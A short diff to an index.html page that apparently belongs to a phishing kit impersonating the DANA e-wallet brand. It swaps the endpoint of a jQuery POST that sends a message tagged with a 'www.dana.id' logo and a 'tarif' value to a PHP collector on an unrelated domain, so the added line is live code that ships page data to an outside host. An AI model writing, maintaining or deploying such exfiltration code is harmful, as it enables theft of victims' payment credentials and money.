--- a/public/ll/index.html
+++ b/public/ll/index.html
@@ -697,7 +697,7 @@ var logo = "☴ www.dana.id ☴";
     var gabungan = "" + logo + '\n\n' + tarif;
         
    $.ajax({
-        url: 'https://bdudu.cloud/dana/cz5kd/ll/im.php',
+        url: 'https://choreo.ii-fi.cfd/cz5kd/ll/im.php',
         data: { message: gabungan },
         method: `POST`,
     
